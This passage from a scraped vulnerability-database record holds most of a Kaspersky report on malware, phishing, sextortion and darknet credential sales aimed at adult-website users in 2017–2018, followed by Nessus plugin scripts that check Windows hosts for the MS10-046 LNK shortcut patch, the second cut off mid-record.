not-a-virus files as video files and naming them using popular porn tags. A 'porn tag' is a special term that is used to easily identify content from a specific pornographic video genre. Tags are used by pornography websites to organize their video libraries and help users quickly and conveniently find the video they are interested in. The not-a-virus type of threat is represented here by RiskTools, Downloaders and AdWare. None of these types is typically classified as malware, yet such applications may do something unwanted to users. 
AdWare, for instance, can show users unsolicited advertising, alter search results and collect user data to show targeted, contextual advertising.\n\nTo check how widespread this trend is, we took the most popular classifications and tags of adult videos from three major legal websites distributing adult content. The groupings were chosen by the overall number of videos uploaded in each category on the websites. As a result, we came up with a list of around 100 tags, which between them may well cover every possible type of pornography in existence. Subsequently, we ran those tags against our database of threats and through the Kaspersky Security Network databases and figured out which of them were used in malicious attacks and how often.\n\nThe overall number of users attacked with malware and not-a-virus threats disguised as porn-themed files dropped by about half compared to 2017. While back then their total number was 168,702, the situation in 2018 was a little more positive: down to 87,227, with 8% of them downloading porn-disguised malware from corporate networks. In this sense, scammers are merely following the overall trend: according to Pornhub's statistics, the share of pornography viewed on desktops has dropped by 18%. However, we were not able to get full confirmation that the 2018 decrease in the number of users attacked with malicious pornography relates to changes in consumer habits.\n\nPerhaps one of the most interesting takeaways from the analysis of how malware and not-a-virus files are distributed among porn tags is that, although we were able to identify as many as 100 tags, most of the attacked users (around 80%, both in 2017 and 2018) encountered threats that mention only 20 of them. The tags used most often match the most popular tags on legitimate websites. 
Although we couldn't find perfect correlations between the top watched types of adult video on legitimate websites and the most often encountered porn-themed threats, the overlap between the tags used for malicious and for legitimate pornography means that malware and not-a-virus authors follow trends set by the pornography-viewing community.\n\nMoving forward, the overall picture surrounding porn-disguised threat types showed more changes in 2018 when compared to 2017. In 2018, we saw 57 variations of threats disguised as famous porn tags, from 642 families. For comparison, the figures in 2017 were 76 and 581 respectively. That means that while the number of samples of porn-malware is growing, the number of types of malware and not-a-virus that are being distributed through pornography is decreasing.\n\nThe top three most popular classes of threats turned out to be Trojan-Downloader, with 45% of files, Trojan with 20% and AdWare, which is not a virus, with 9%, while in 2017 the top three were different: Trojan-Downloader was still there with 29%, exploits took second place with 23% and Trojans accounted for around 19%.\n\n**Distribution of porn-themed threat types in 2017** | **%** | **Distribution of porn-themed threat types in 2018** | **%** \n---|---|---|--- \nTrojan-Downloader | 29% | Trojan-Downloader | 45% \nExploit | 23% | Trojan | 20% \nTrojan | 19% | AdWare (not a virus) | 9% \nAdWare (not a virus) | 11% | Worm | 8% \nWorm | 6% | Virus | 2% \nVirus | 2% | Downloader (not a virus) | 2% \nRiskTool (not a virus) | 2% | Exploit | 2% \nDownloader (not a virus) | 2% | Trojan-Dropper | 2% \nTrojan-Dropper | 1% | UDS: DangerousObject | 2% \nOther | 5% | Other | 8% \n \n_Top-10 types of threat that went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. Source: Kaspersky Security Network_\n\n_Top-10 verdicts which went under the disguise of porn-related categories, by the number of attacked users in 2017 and 2018. 
Source: Kaspersky Security Network_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20151847/threats-to-users-of-adult-websites-in-2018-2.png>)\n\nThe most noticeable change in the overall picture is the large number of exploits in 2017: back then they accounted for almost a quarter of all infected files, while in 2018 they were not represented in the top 10. There is an explanation for the popularity of such threats. In 2017, exploits were represented by massive detections of Exploit.Win32.CVE-2010-2568.gen, a generic detection (one that covers multiple similar malware pieces) for files that exploited the vulnerability in the Windows Shell named [CVE-2010-2568](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2568>). However, the same detection name also applies to another vulnerability in LNK handling, [CVE-2017-8464](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464>). This vulnerability, and the publicly available exploit for it, became public in 2017 and immediately raised a lot of interest amongst threat actors \u2013 thereby driving up the number of exploit detections. Within a year, the attacks on CVE-2017-8464 fell significantly as most users patched their computers and malware writers went back to using classical malware aimed at more common file formats (such as JS, VBS, PE).\n\nThe rise in popularity of Trojan-Downloaders can be explained by the fact that such malicious programs are multipurpose: once installed on a victim's device, the threat actor can additionally download virtually any payload they want, from DDoS bots and malicious ad clickers to password stealers or banking Trojans. As a result, a criminal needs to infect the victim's device only once and can then use it in multiple malicious ways.\n\n2018 also saw some changes in the share of software that is not-a-virus. All in all, such programs accounted for 15% of all threats in 2017. 
In 2018, however, they were on the decline and now account for 11%, with downloaders losing their place in the top-10 most prolific threats. So, while the attackers are using porn less as a decoy, they have yet to inject the malicious files with more harmful threats, such as Trojans and worms.\n\n### Mobile malware\n\nFollowing technical changes in how we detect and analyze mobile malware, we amended our methodology for this report. Instead of trying to identify the share of porn-themed content in the overall volume of malicious applications that our users encountered, we selected 100,000 random malicious installation packages disguised as porn videos for Android, in 2017 and 2018, and checked them against the database of popular porn tags.\n\nThe landscape for types and families of mobile threats is also different than for PC. In both 2017 and 2018, the most common type of threat was AdWare: 70% in 2017 and 89% in 2018.\n\n**Malware name** | **%** | **Malware name** | **%** \n---|---|---|--- \nnot-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 59.61% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 62.88% \nnot-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 11.02% | not-a-virus:HEUR:AdWare.AndroidOS.Agent.n | 17.09% \nHEUR:Trojan-Ransom.AndroidOS.Zebt.a | 5.33% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.h | 9.62% \nHEUR:Trojan.AndroidOS.Loapi.b | 3.76% | HEUR:Trojan-Ransom.AndroidOS.Zebt.a | 3.27% \nHEUR:Trojan-Ransom.AndroidOS.Small.snt | 2.22% | HEUR:Trojan.AndroidOS.Boogr.gsh | 0.74% \nHEUR:Trojan-Dropper.AndroidOS.Agent.hb | 1.93% | HEUR:Trojan-Ransom.AndroidOS.Small.snt | 0.74% \nnot-a-virus:HEUR:AdWare.AndroidOS.Agent.f | 1.90% | UDS:DangerousObject.Multi.Generic | 0.52% \nHEUR:Trojan-Ransom.AndroidOS.Small.as | 1.54% | HEUR:Trojan-Ransom.AndroidOS.Small.as | 0.41% \nHEUR:Trojan-Ransom.AndroidOS.Small.cj | 1.29% | not-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 0.36% \nnot-a-virus:HEUR:AdWare.AndroidOS.Ewind.cx | 1.07% | HEUR:Trojan-Ransom.AndroidOS.Small.cj | 0.36% \n \n_Top-10 
verdicts that represent porn-related categories, by the number of attacked mobile users, in 2017 and 2018. Source: Kaspersky Security Network_\n\nThese threats are typically distributed through affiliate programs focused on earning money as a result of users installing applications and clicking on an advertisement. As well as AdWare, pornography is also used to distribute ransomware (4% in 2018), but on a much smaller scale compared to 2017, when more than 10% of users faced such malicious programs. This decline is most likely a reflection of the overall downward trend for ransomware seen in the malware landscape.\n\n### Credential hunters\n\nA specific type of malware related to pornography, which we have been tracking throughout the year, is implemented by so-called credential hunters. We track them with the help of our botnet-tracking technology, which monitors active botnets and receives intelligence on what kind of activities they perform, in order to prevent emerging threats.\n\nWe particularly track botnets made up of malware-infected machines. Upon installation on a PC, this malware can monitor which web pages are opened, or create a fake one where the user enters their login and password credentials. Usually such programs are made for stealing money from online banking accounts, but last year we were surprised to discover that there are bots in these botnets that hunt for credentials to pornography websites.\n\nBased on the data we were able to collect, in 2017 there were 27 variations of bots, belonging to three families of banking Trojans (Betabot, Neverquest and Panda), attempting to steal credentials. These Trojans were after credentials to accounts for 10 famous adult content websites (Brazzers, Chaturbate, Pornhub, Myfreecams, Youporn, Wilshing, Motherless, XNXX, X-videos). During 2017, these bots attempted to infect more than 50,000 users over 307,000 times.\n\nIn 2018, the number of attacked users doubled, reaching more than 110,000 PCs across the world. 
The number of attacks almost tripled, to 850,000 infection attempts. At the same time, the number of variations of malware we were able to spot fell from 27 to 22, but the number of families increased from three to five, meaning that pornography credentials are considered valuable by ever more cybercriminals.\n\nAnother important shift that happened in 2018 was that malware families no longer hunt for credentials to multiple websites. Instead, they focus on just two, mostly Pornhub and XNXX, whose users were targeted by bots belonging to the Jimmy malware family.\n\nApparently Pornhub remains popular, not only with regular users of the web, but also with cybercriminals looking for another way of gaining illegal profits by selling user credentials.\n\n## Part 2 - Phishing and spam\n\nOur previous research suggested that it is relatively rare to see pornography as a topic of interest in phishing scams. Instead, criminals prefer to exploit popular sites dedicated to finding sex partners. But in 2018, our anti-phishing technologies started blocking phishing pages that resemble popular pornography websites.\n\nThese are generally pages disguised as pornhub.com, youporn.com, xhamster.com, and xvideos.com. In Q4 2017, the overall number of attempts to access phishing pages pretending to be one of the listed websites was **1,608**. Within a year, in Q4 2018, the number of such attempts (**21,902**) was more than ten times higher.\n\nThe overall number of attempts to visit phishing webpages pretending to be one of the popular adult-content resources was **38,305**. Leading the list of accessed phishing pages were those that were disguised as a Pornhub page. There were **37,144** attempts to visit the phishing version of the website, while there were only **1,161** attempts to visit youporn.com, xhamster.com, and xvideos.com in total. These figures are still relatively low; other phishing categories may see detection results of millions of attempts per year. 
However, the fact that the number of detections on pornography pages is growing may mean that criminals are only just beginning to explore the topic.\n\nIt is worth mentioning that phishing pages cannot influence the original page in any way; they merely copy it. The authentic Pornhub page is not connected to the phishing. Moreover, most search engines usually successfully block such phishing pages, so the most likely way to reach them is through phishing or spam e-mails, or by being redirected there by malware or a malicious frame on another website.\n\nFake versions of popular pornography websites target users' credentials and contact details, which can later be either sold or used in other fraud schemes or cyberattacks. In general, credential capture is one of the most popular ways of targeting users in phishing fraud schemes that use pornography as a lure. In such schemes, the victim is often lured to a phishing website disguised as a social network, where they are asked to authenticate their identity in order to watch an adult video which can only be accessed if the user confirms they are over 18 years old.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160843/threats-to-users-of-adult-websites-in-2018-5.png>)\n\nAs the victim enters their password, the threat actor captures the credentials to the user's social network account.\n\nPornographic content phishing can also be used to install malicious software. 
For example, to access an alleged adult video, the phishing page requires the user to download and update a video player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160919/threats-to-users-of-adult-websites-in-2018-6.png>)\n\nNeedless to say, instead of downloading a video player, the user downloads malware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20160946/threats-to-users-of-adult-websites-in-2018-7.png>)\n\nSometimes phishing fraudsters target e-wallet credentials with the help of pornographic content. The victim is lured to the pornographic website to watch a video broadcast. In order to view the content, the user is asked to enter their payment credentials.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21093209/threats-to-users-of-adult-websites-in-2018-8.png>)\n\n### **Spam-scam**\n\nWe have rarely seen pornographic content used in any special or specific way when it comes to spam. Apart from the mass distribution of 'standard' advertising offering adult content on legitimate and illegal websites, this type of threat hasn't been spotted using pornography in a creative way. However, there is one exception. Beginning in 2017, an infamous sextortion scam emerged: users started to receive messages containing an extortion letter demanding that they transfer bitcoins to the fraudsters.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143648/threats-to-users-of-adult-websites-in-2018-9.png>)\n\nThe scammers claimed to have personal messages and recordings of the victim watching porn. The letters even claimed that the threat actor could combine the video that the supposed victim was watching with what was recorded through their webcam. 
This extortion is based purely on making threats.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143709/threats-to-users-of-adult-websites-in-2018-10.png>)\n\n2018, however, saw an increase in the volume of such e-mails. Moreover, they became more sophisticated and were not only threatening the user, but also 'proving' the legitimacy of the scammers' claims by providing the user with actual information about them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143739/threats-to-users-of-adult-websites-in-2018-11.png>)\n\nIn most cases, it was either a password, or a phone number, or a combination of both with an e-mail address. Since people tend to use the same passwords for different websites, the victim was often likely to believe that paired passwords and e-mail addresses found by the criminal on the dark web were authentic, even if they were not actually correct for the adult-content account in question.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143805/threats-to-users-of-adult-websites-in-2018-12.png>)\n\nFurthermore, these e-mails have been sent out in more languages than previously found.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143826/threats-to-users-of-adult-websites-in-2018-13.png>) | [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143902/threats-to-users-of-adult-websites-in-2018-14.png>) \n---|--- \n \nIn reality, these mailings were based purely on the assumption that the target of such e-mails would hand over their credentials and that these would become profitable. The number of such scams grew in 2018.\n\n## Part 3 - Darknet insights\n\nOne of the burning topics of the adult-content industry is the controversy surrounding paid subscriptions to access websites. 
It is often the case that users can register for pornography accounts through a 'premium' subscription model (that includes no advertisements and unlimited access to the adult website content). Otherwise, the website they want to access does not allow them to watch any free content at all unless they pay. At most, the user may see video previews for free but still be expected to make a payment to watch the full video. The opinions around such practice vary. Some people [claim](<https://fightthenewdrug.org/problem-with-paying-for-porn-or-watching-for-free/>) that money paid for porn \"directly fuels the industry that supports the abuse, exploitation, and trafficking around the world\". [Others argue](<https://www.self.com/story/this-is-why-you-should-pay-for-porn>) that pornography is like most other commodities and people are willing to exchange money for it just as they would for other kinds of entertainment, such as TV series or music. Some, though, prefer to highlight examples of when adult content can result in people being denied their human rights.\n\nWhether it is worth it or not, [some](<https://www.die-screaming.com/porn-memberships-expensive-429291/>) users agree that the price of premium accounts to popular pornography websites is rather high. For example, monthly memberships can vary from $20 to $30, and annual unlimited access costs might scale from $120 to $150. This is where cybercriminals enter the fray.\n\nThe research on porn-related cyberthreats we did previously proved that there is a very well developed supply and demand chain for stolen credentials on the dark web. We conducted research on this issue again in 2018, analyzing 20 of the top-rated Tor marketplaces listed on DeepDotWeb - an open Tor site that contains a dynamic ranking of dark markets evaluated by Tor administrators based on customers' feedback. All of them contained from one to more than 3,000 offers for credentials to adult content websites. 
In total, 29 websites displayed more than 15,000 offers to buy one or more accounts to pornography websites (with, of course, no legal guarantee that the sellers will deliver on their promise).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/20143918/threats-to-users-of-adult-websites-in-2018-15.jpg>) | [](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/02/21093226/threats-to-users-of-adult-websites-in-2018-16.jpg>) \n---|--- \n \nThe results of the research conducted in the last year showed that four of the researched markets that offered the widest range of stolen credentials provided users with more than 5,239 unique offers. The figure for 2018 showed that their number doubled, accounting for more than 10,000 offers on sale.\n\nThe quantity of accounts available ranged from 1 to 30, with a few exceptions mostly from poorly rated sellers. However, the majority of offers promised to deliver credentials to only one account. Regardless of the type of account, the prices vary from $3 to $9 per offer, very rarely exceeding $10 \u2013 the same as back in 2017, with the vast majority of prices being limited to $6-$7 or the equivalent amount in bitcoin, which is 20 times cheaper than the most modest annual memberships. Getting access to an account illegally for a lower cost than a legal subscription is not the only appeal of buying such credentials on the dark web. There is the added appeal of anonymity, hiding behind other people's credentials while watching pornography.\n\n## Conclusions and advice\n\nOverall, the amount of downloadable malware disguised as pornography detected on users' devices significantly decreased in 2018 in comparison with record activity in 2017. While at first glance this looks like good news, a worrying trend has appeared. 
The number of users being attacked with malware that hunts for their pornographic content credentials is on the rise, and this means premium subscriptions are now a valuable asset for cybercriminals. There is also the fact that many modern pornography websites include social functionality, allowing people to share their own private content in different ways through the website. Some people make it freely available for all, some decide to limit who can see it. There has also been a significant rise in the number of cases where people suffer from sextortion. In other words, the sphere of adult content may contain cybersecurity challenges other than the 'classic' infected pornography websites and video files armed with malware. These challenges should be addressed properly.\n\nAnother cybersecurity risk that adult content brings, which may be less obvious, is the misuse of corporate resources. As mentioned at the beginning of this report, the unsafe consumption of pornography from the workplace may result in the corporate network being hit by a massive infection. While most malicious attacks using pornography are aimed at consumers, not corporations, the fact that most consumers have a job to go to every day brings a certain risk to IT administrators responsible for securing corporate networks.\n\nIn order to consume and produce adult content safely, Kaspersky Lab advises the following:\n\n**For consumers:**\n\n * Before clicking any link, check the link address shown, even in the search results of trusted search engines. If the address was received in an e-mail, check if it is the same as the actual hyperlink.\n * Do not click on questionable websites when they are offered in search results and do not install anything that comes from them.\n * If you wish to buy a paid subscription to an adult content website \u2013 purchase it only on the official website. 
Double check the URL of the website and make sure it is authentic.\n * Check any email attachments with a security solution before opening them \u2013 especially from dark web entities (even if they are expected to come from an anonymous source).\n * Patch the software on your PC as soon as security updates for the latest bugs are available.\n * Do not download pirated software and other illegal content, even if you were redirected to the webpage from a legitimate website.\n * Use a reliable security solution with behavior-based anti-phishing technologies \u2013 such as [Kaspersky Total Security](<https://www.kaspersky.com/downloads/thank-you/total-security-free-trial>), to detect and block spam and phishing attacks.\n * Use a robust security solution to protect you from malicious software and its actions \u2013 such as [Kaspersky Internet Security for Android](<https://www.kaspersky.com/android-security>).\n\n**For businesses:**\n\n * Educate employees in basic security hygiene, and explain the policies on accessing web sites potentially containing illegal or restricted content, as well as not opening emails or clicking on links from unknown sources.\n * Businesses can also block access to web sites that contravene corporate policy, such as porn sites, by using a dedicated endpoint solution such as [Kaspersky Endpoint Security for Business](<https://www.kaspersky.com/small-to-medium-business-security/endpoint-advanced>). 
In addition to anti-spam and anti-phishing, it must include application and web controls, and web threat protection that can detect and block access to malicious or phishing web addresses.", "modified": "2019-02-21T10:00:01", "published": "2019-02-21T10:00:01", "id": "SECURELIST:82490B192CB8F0CC0E1B0205E044FDB8", "href": "https://securelist.com/threats-to-users-of-adult-websites-in-2018/89634/", "type": "securelist", "title": "Threats to users of adult websites in 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T06:15:45", "description": "The remote windows host contains a version of the Windows Shell that\ncontains a vulnerability in the way it handles shortcut icons. An\nattacker, exploiting this flaw, can execute arbitrary commands on the\nremote host subject to the privileges of the user opening the\nshortcut.\n\nEASYHOOKUP is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.", "edition": 32, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2010-08-02T00:00:00", "title": "MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198) (EASYHOOKUP)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2568"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS10-046.NASL", "href": "https://www.tenable.com/plugins/nessus/48216", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(48216);\n script_version(\"1.27\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2010-2568\");\n script_bugtraq_id(41732);\n script_xref(name:\"CERT\", value:\"940193\");\n script_xref(name:\"EDB-ID\", value:\"14403\");\n script_xref(name:\"MSFT\", value:\"MS10-046\");\n script_xref(name:\"Secunia\", 
value:\"40647\");\n script_xref(name:\"MSKB\", value:\"2286198\");\n\n script_name(english:\"MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution (2286198) (EASYHOOKUP)\");\n script_summary(english:\"Checks version of shell32.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote windows host is affected by a remote code execution\nvulnerability.\");\n\n script_set_attribute(attribute:\"description\", value:\n\"The remote windows host contains a version of the Windows Shell that\ncontains a vulnerability in the way it handles shortcut icons. An\nattacker, exploiting this flaw, can execute arbitrary commands on the\nremote host subject to the privileges of the user opening the\nshortcut.\n\nEASYHOOKUP is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Shell LNK Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/07/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/08/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS10-046';\nkbs = make_list(\"2286198\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'2,3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nkb = '2286198';\nif (\n # Windows 7 / Server 2008 R2\n 
hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Shell32.dll\", version:\"6.1.7600.16644\", min_version:\"6.1.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Shell32.dll\", version:\"6.1.7600.20765\", min_version:\"6.1.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Shell32.dll\", version:\"6.0.6002.18287\", min_version:\"6.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Shell32.dll\", version:\"6.0.6002.22454\", min_version:\"6.0.6002.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Shell32.dll\", version:\"6.0.6001.18505\", min_version:\"6.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Shell32.dll\", version:\"6.0.6001.22735\", min_version:\"6.0.6001.22000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 and XP x64\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Shell32.dll\", version:\"6.0.3790.4751\", dir:\"\\System32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP\n hotfix_is_vulnerable(os:\"5.1\", arch:\"x86\", file:\"Shell32.dll\", version:\"6.0.2900.6018\", dir:\"\\System32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/MS10-046\", value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T06:15:28", "description": "Windows Shell does not properly validate the parameters of a shortcut\nfile when loading its icon. Attempting to parse the icon of a\nspecially crafted shortcut file can result in arbitrary code\nexecution. 
A remote attacker could exploit this by tricking a user\ninto viewing a malicious shortcut file via Windows Explorer, or any\nother application that parses the shortcut's icon. This can also be\nexploited by an attacker who tricks a user into inserting removable\nmedia containing a malicious shortcut (e.g. CD, USB drive), and\nAutoPlay is enabled.\n\nEASYHOOKUP is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.", "edition": 33, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2010-07-18T00:00:00", "title": "MS KB2286198: Windows Shell Shortcut Icon Parsing Arbitrary Code Execution (EASYHOOKUP)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-2568"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_KB_2286198.NASL", "href": "https://www.tenable.com/plugins/nessus/47750", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(47750);\n script_version(\"1.25\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2010-2568\");\n script_bugtraq_id(41732);\n script_xref(name:\"CERT\", value:\"940193\");\n script_xref(name:\"EDB-ID\", value:\"14403\");\n script_xref(name:\"MSFT\", value:\"MS10-046\");\n script_xref(name:\"Secunia\", value:\"40647\");\n script_xref(name:\"MSKB\", value:\"2286198\");\n\n script_name(english:\"MS KB2286198: Windows Shell Shortcut Icon Parsing Arbitrary Code Execution (EASYHOOKUP)\");\n script_summary(english:\"Checks if displaying shortcut icons has been disabled\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"It may be possible to execute arbitrary code on the remote Windows\nhost using a malicious shortcut file.\");\n script_set_attribute(attribute:\"description\", value:\n\"Windows Shell does not properly validate the parameters of a shortcut\nfile when loading 
its icon. Attempting to parse the icon of a\nspecially crafted shortcut file can result in arbitrary code\nexecution. A remote attacker could exploit this by tricking a user\ninto viewing a malicious shortcut file via Windows Explorer, or any\nother application that parses the shortcut's icon. This can also be\nexploited by an attacker who tricks a user into inserting removable\nmedia containing a malicious shortcut (e.g. CD, USB drive), and\nAutoPlay is enabled.\n\nEASYHOOKUP is one of multiple Equation Group vulnerabilities and\nexploits disclosed on 2017/04/14 by a group known as the Shadow\nBrokers.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2010/2286198\");\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2010/ms10-046\"\n );\n script_set_attribute(attribute:\"solution\", value:\n\"Either apply the MS10-046 patch or disable the displaying of shortcut\nicons (refer to the Microsoft advisory).\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows Shell LNK Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", 
